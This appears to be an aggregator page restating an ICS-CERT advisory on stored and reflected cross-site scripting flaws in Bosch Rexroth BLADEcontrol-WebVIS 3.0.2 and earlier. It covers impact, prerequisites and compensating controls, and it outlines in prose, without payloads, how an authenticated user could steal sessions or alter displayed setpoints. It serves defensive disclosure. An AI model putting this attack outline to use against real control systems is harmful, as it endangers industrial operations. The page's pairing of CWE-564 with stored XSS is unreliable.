Rexroth Bosch BLADEcontrol-WebVIS Vulnerabilities

Monitor6.4ICS-CERT ICSA-16-187-01Apr 8, 2016

Attack VectorNetwork

Auth RequiredLow

ComplexityLow

User InteractionNone needed

Summary

BLADEcontrol-WebVIS versions 3.0.2 and earlier contain cross-site scripting (XSS) vulnerabilities (CWE-564 stored XSS, CWE-79 reflected XSS) in the web interface. An authenticated attacker can inject malicious JavaScript or HTML code through unvalidated input fields. When other users access the affected pages, the injected code executes in their browsers, potentially compromising session security, modifying displayed control parameters, or redirecting users to malicious content.

What this means

What could happen

An attacker with valid login credentials could inject malicious code into the BLADEcontrol-WebVIS interface, affecting other users viewing the same web pages or potentially altering displayed process data and control parameters.

Who's at risk

Bosch Rexroth BLADEcontrol-WebVIS users, particularly operators and engineers using the web-based interface to monitor and control hydraulic or industrial systems. This affects any facility running BLADEcontrol-WebVIS version 3.0.2 or earlier for remote monitoring or control of industrial equipment.

How it could be exploited

An authenticated user accesses the BLADEcontrol-WebVIS web interface and injects JavaScript or HTML code through an unvalidated input field. When other users view the affected page, the malicious code executes in their browsers, allowing the attacker to steal session tokens, modify displayed setpoints, or redirect users to malicious sites.

Prerequisites

Valid login credentials for BLADEcontrol-WebVIS
Network access to the web interface (typically port 80/443)
Another user must view the page containing the injected payload

Remotely exploitableRequires valid credentialsNo patch availableStored and reflected cross-site scripting (XSS)Can affect multiple users viewing the interface

Exploitability

Low exploit probability (EPSS 0.5%)

Affected products (1)

ProductAffected VersionsFix Status

BLADEcontrol-WebVIS: <=3.0.2≤ 3.0.2No fix (EOL)

Remediation & Mitigation

0/6

Do now

0/3

HARDENINGRestrict network access to the BLADEcontrol-WebVIS web interface to authorized engineering and operations personnel only using firewall rules or network segmentation

WORKAROUNDDisable or restrict access to BLADEcontrol-WebVIS if not actively needed for operations

HARDENINGEnforce strong password policies and multi-factor authentication for all BLADEcontrol-WebVIS accounts

Schedule — requires maintenance window

0/1

Patching may require device reboot — plan for process interruption

WORKAROUNDImplement web application firewall (WAF) rules to block or sanitize suspicious input patterns sent to BLADEcontrol-WebVIS

Mitigations - no patch available

0/2

BLADEcontrol-WebVIS: <=3.0.2 has reached End of Life. The vendor will not release a patch. Apply the following compensating controls:

HARDENINGMonitor user access logs and alert on suspicious authentication patterns

HARDENINGEvaluate migration to a patched or alternative control interface solution

CVEs (2)

CVE-2016-4508 CVE-2016-4507

View full CISA ICS-CERT advisory

↑↓ Navigate · Esc Close

API: /api/v1/advisories/5b9cf02b-f722-4e6b-a72d-ae9610073eb1